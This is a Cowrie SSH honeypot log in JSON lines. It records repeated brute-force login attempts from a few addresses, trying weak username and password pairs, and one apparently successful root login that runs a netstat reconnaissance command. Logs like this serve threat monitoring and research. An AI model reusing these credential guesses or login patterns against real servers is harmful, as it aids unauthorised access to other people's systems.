{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:50.936300Z","src_ip":"212.227.125.160","session":"9d8209357592"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35328,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5700f5e7ed7","protocol":"ssh","message":"New connection: 212.227.125.160:35328 (1.2.3.4:22) [session: f5700f5e7ed7]","sensor":"my-vps","timestamp":"2025-08-28T11:30:29.773191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:30:29.780232Z","src_ip":"212.227.125.160","session":"f5700f5e7ed7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:30:29.940277Z","src_ip":"212.227.125.160","session":"f5700f5e7ed7"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456789","message":"login attempt [user/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:30:30.838031Z","src_ip":"212.227.125.160","session":"f5700f5e7ed7"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:30:32.136331Z","src_ip":"212.227.125.160","session":"f5700f5e7ed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55456,"dst_ip":"1.2.3.4","dst_port":22,"session":"b686aa977045","protocol":"ssh","message":"New connection: 212.227.125.160:55456 (1.2.3.4:22) [session: b686aa977045]","sensor":"my-vps","timestamp":"2025-08-28T11:31:05.787577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:31:05.788595Z","src_ip":"212.227.125.160","session":"b686aa977045"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:31:05.848323Z","src_ip":"212.227.125.160","session":"b686aa977045"}
{"eventid":"cowrie.login.failed","username":"solana","password":"1234","message":"login attempt [solana/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:31:06.030101Z","src_ip":"212.227.125.160","session":"b686aa977045"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:07.092547Z","src_ip":"212.227.125.160","session":"b686aa977045"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52168,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f52e4393856","protocol":"ssh","message":"New connection: 212.227.125.160:52168 (1.2.3.4:22) [session: 0f52e4393856]","sensor":"my-vps","timestamp":"2025-08-28T11:31:11.824502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:31:11.882898Z","src_ip":"212.227.125.160","session":"0f52e4393856"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:31:11.989739Z","src_ip":"212.227.125.160","session":"0f52e4393856"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:31:12.634314Z","src_ip":"212.227.125.160","session":"0f52e4393856"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:13.796768Z","src_ip":"212.227.125.160","session":"0f52e4393856"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54424,"dst_ip":"1.2.3.4","dst_port":22,"session":"2da26607db70","protocol":"ssh","message":"New connection: 217.72.205.35:54424 (1.2.3.4:22) [session: 2da26607db70]","sensor":"my-vps","timestamp":"2025-08-28T11:31:28.602118Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:28.603338Z","src_ip":"217.72.205.35","session":"2da26607db70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36372,"dst_ip":"1.2.3.4","dst_port":22,"session":"86777535b69a","protocol":"ssh","message":"New connection: 212.227.125.160:36372 (1.2.3.4:22) [session: 86777535b69a]","sensor":"my-vps","timestamp":"2025-08-28T11:31:28.689655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:31:28.817656Z","src_ip":"212.227.125.160","session":"86777535b69a"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-28T11:31:28.818493Z","src_ip":"212.227.125.160","session":"86777535b69a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60481,"dst_ip":"1.2.3.4","dst_port":22,"session":"75b4f99d9933","protocol":"ssh","message":"New connection: 212.227.235.229:60481 (1.2.3.4:22) [session: 75b4f99d9933]","sensor":"my-vps","timestamp":"2025-08-28T11:31:42.562603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:31:42.782444Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:31:43.112005Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:43.928761Z","src_ip":"212.227.125.160","session":"86777535b69a"}
{"eventid":"cowrie.login.success","username":"root","password":"0negaii","message":"login attempt [root/0negaii] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:31:44.831911Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:31:45.670427Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-28T11:31:45.671116Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:46.086817Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:46.188229Z","src_ip":"212.227.235.229","session":"75b4f99d9933"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49944,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f711c735bd5","protocol":"ssh","message":"New connection: 212.227.125.160:49944 (1.2.3.4:22) [session: 3f711c735bd5]","sensor":"my-vps","timestamp":"2025-08-28T11:31:53.314805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:31:53.315788Z","src_ip":"212.227.125.160","session":"3f711c735bd5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:31:53.477222Z","src_ip":"212.227.125.160","session":"3f711c735bd5"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345678","message":"login attempt [user/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:31:53.966254Z","src_ip":"212.227.125.160","session":"3f711c735bd5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:31:55.131111Z","src_ip":"212.227.125.160","session":"3f711c735bd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58680,"dst_ip":"1.2.3.4","dst_port":22,"session":"e98460a86d9d","protocol":"ssh","message":"New connection: 212.227.125.160:58680 (1.2.3.4:22) [session: e98460a86d9d]","sensor":"my-vps","timestamp":"2025-08-28T11:32:35.013414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:32:35.163455Z","src_ip":"212.227.125.160","session":"e98460a86d9d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:32:35.235389Z","src_ip":"212.227.125.160","session":"e98460a86d9d"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty","message":"login attempt [user/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:32:35.848076Z","src_ip":"212.227.125.160","session":"e98460a86d9d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:32:37.012262Z","src_ip":"212.227.125.160","session":"e98460a86d9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43616,"dst_ip":"1.2.3.4","dst_port":22,"session":"557881b63172","protocol":"ssh","message":"New connection: 212.227.125.160:43616 (1.2.3.4:22) [session: 557881b63172]","sensor":"my-vps","timestamp":"2025-08-28T11:33:15.817254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:33:15.944525Z","src_ip":"212.227.125.160","session":"557881b63172"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:33:16.031206Z","src_ip":"212.227.125.160","session":"557881b63172"}
{"eventid":"cowrie.login.failed","username":"user","password":"123123","message":"login attempt [user/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:33:16.725915Z","src_ip":"212.227.125.160","session":"557881b63172"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:33:18.056969Z","src_ip":"212.227.125.160","session":"557881b63172"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60280,"dst_ip":"1.2.3.4","dst_port":22,"session":"0127abcfd540","protocol":"ssh","message":"New connection: 212.227.125.160:60280 (1.2.3.4:22) [session: 0127abcfd540]","sensor":"my-vps","timestamp":"2025-08-28T11:33:54.820790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:33:54.821673Z","src_ip":"212.227.125.160","session":"0127abcfd540"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:33:54.985107Z","src_ip":"212.227.125.160","session":"0127abcfd540"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:33:55.558086Z","src_ip":"212.227.125.160","session":"0127abcfd540"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:33:56.723679Z","src_ip":"212.227.125.160","session":"0127abcfd540"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":14315,"dst_ip":"1.2.3.4","dst_port":22,"session":"37c1d2417872","protocol":"ssh","message":"New connection: 80.94.95.15:14315 (1.2.3.4:22) [session: 37c1d2417872]","sensor":"my-vps","timestamp":"2025-08-28T11:34:08.143698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:34:08.145563Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
